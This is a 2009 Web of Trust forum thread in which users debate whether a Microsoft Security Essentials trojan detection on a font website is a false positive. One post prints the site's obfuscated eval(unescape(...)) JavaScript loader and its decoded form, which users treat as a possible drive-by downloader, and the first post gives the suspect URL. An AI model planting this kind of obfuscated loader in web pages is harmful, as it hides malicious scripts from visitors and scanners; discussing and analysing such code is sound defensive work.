Comments on websites

Användarbild

My first trojan

mån 16 nov 2009 08.06.32 av cyberwitch

I've never had it happen before, but Microsoft Security Essentials detected and removed a javascript file that it identified as "TrojanDownloader:JS/Agent.IH" on a page I was visiting: http:// www rune-fonts co uk/fontlist php (I didn't research other pages on the site). Because I don't really feel qualified to assess this sort of threat, I wanted to mention it on the forums in case the MS software produced a false positive. (The WOT rating of the domain is green but I added a comment and rated trustworthiness in the red). Thanks.

Användarbild

:(

mån 16 nov 2009 08.17.38 av Warxas

Sorry to hear that cyberwitch. You are very lucky, that this is your only trojan so far though! (Of course it's also good that Microsoft Security Essentials blocked it!)

Thank you for the heads up, I have rated the site red, agreed to your comment and placed my own comment on the scorecard.

Just one note, in the future please don't post LIVE malware links. Thanks! :D

Användarbild

Live link to malware

mån 16 nov 2009 08.27.51 av cyberwitch

Sorry about that, noted for next time.

Användarbild

Should we put this at the

mån 16 nov 2009 09.39.39 av Delan Azabani

Should we put this at the top of the forum topic list? Not a whole 123-rule rulebook, but a few important rules like not to post live links? I've e-mailed the developers on the Support page.

Användarbild

I think you have a false

mån 16 nov 2009 11.49.16 av osfijwoei390WEFw23sf

I think you have a false positive. This is the link for the Microsoft Security Essentials page for the pop up you got: http://www.microsoft.com/security/portal/Threat/En...

It is pretty generic. I also checked Google Safe Browsing and Wepawet and they both found nothing.

Användarbild

if u haven't already u can

mån 16 nov 2009 16.58.05 av demonluo

if u haven't already u can run ur broswer in virtual environment w sandboxie...
http://www.sandboxie.com/

Användarbild

This is probably the source of the detection

mån 16 nov 2009 22.13.30 av amishrabbit

The following code is loaded in a javascript file on that page:

enc.js:


eval(unescape("%66%75%6e%63%74%69%6f%6e%20%52%72%52%72%52%72%52%72%28%74%65%61%61%62%62%29%20%7b%76%61%72%20%74%74%74%6d%6d%6d%3d%22%22%3b%6c%3d%74%65%61%61%62%62%2e%6c%65%6e%67%74%68%3b%77%77%77%3d%68%68%68%68%66%66%66%66%3d%4d%61%74%68%2e%72%6f%75%6e%64%28%6c%2f%32%29%3b%69%66%28%6c%3c%32%2a%77%77%77%29%09%68%68%68%68%66%66%66%66%3d%68%68%68%68%66%66%66%66%2d%31%3b%66%6f%72%28%69%3d%30%3b%69%3c%68%68%68%68%66%66%66%66%3b%69%2b%2b%29%74%74%74%6d%6d%6d%20%3d%20%74%74%74%6d%6d%6d%20%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%69%29%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%69%2b%68%68%68%68%66%66%66%66%29%3b%69%66%28%6c%3c%32%2a%77%77%77%29%20%74%74%74%6d%6d%6d%20%3d%20%74%74%74%6d%6d%6d%20%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%6c%2d%31%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%74%74%74%6d%6d%6d%29%3b%7d%3b"));

Decoded, that becomes:


eval(function RrRrRrRr(teaabb) {var tttmmm="";l=teaabb.length;www=hhhhffff=Math.round(l/2);if(l<2*www) hhhhffff=hhhhffff-1;for(i=0;i (anglebracket) hhhhffff;i++)tttmmm = tttmmm + teaabb.charAt(i)+ teaabb.charAt(i+hhhhffff);if(l<2*www) tttmmm = tttmmm + teaabb.charAt(l-1);document.write(tttmmm);};)

I leave as an exercise to the reader why a website would go to such lengths to obfuscate code.

I don't believe this is a false positive.

Användarbild

I seen many video hosting

mån 16 nov 2009 23.49.01 av osfijwoei390WEFw23sf

I seen many video hosting sites do that kind of obfuscation to prevent people from easily downloading videos or hotlinking to the videos. That code does not look all that suspicious.

Användarbild

Unmask

mån 16 nov 2009 23.50.56 av Warxas

Parasites finds the code suspicious as well. http://www.unmaskparasites.com/security-report/?pa...

Which I stated on my scorecard comment.

Användarbild

I've also seen this kind of code a lot

tis 17 nov 2009 18.45.24 av amishrabbit

except I usually see it used by sites as a way to obfuscate driveby scripts or shellcode. It might be entirely benign in this instance, but we don't know for sure why it's there.

Could you give me a few examples of video sites that do this? I'm just curious.

I'm willing to bet the signature is based on the escaped hexadecimal for "eval(function" or "document.write" -- if it is, it probably is more overbroad than it should be. But I'm completely guessing here.

Användarbild

Microsoft security product

tis 17 nov 2009 13.20.25 av demonluo

Microsoft security product is famous for low F/P....

Användarbild

MSE also found Trojan on my computer

ons 18 nov 2009 23.11.52 av Jadeyes

I just downloaded Microsoft Security Essentials today and I did a full scan of my PC. MSE found on few of my several wallpapers Trojan:Win32/Jpgiframe.A I have downloaded them from ewallpapers.eu. Most of these wallpapers are ok, but you never know... So beware of this website and scan your computer frequently with several scanners. I have always used and scanned PC with MBAM, SAS and Avira, but only MSE found these threats. That's not good :(

Användarbild

re: Trojan:Win32/Jpgiframe.A

tor 19 nov 2009 01.39.24 av g7w

Trojan:Win32/Jpgiframe.A

I'm curious as to which wallpaper files were detected. Wallpaper name and resolution or better.. the direct URL would be nice. ;-)

ewallpapers.eu is green though there are a few comments about malicious files.

I've just downloaded several wallpapers at different resolutions and all are clean...
-------
WOT Services Ltd. - gives us safety through Web of Trust.
WOT Community - gives us security through unity.
Thank you all
- G7W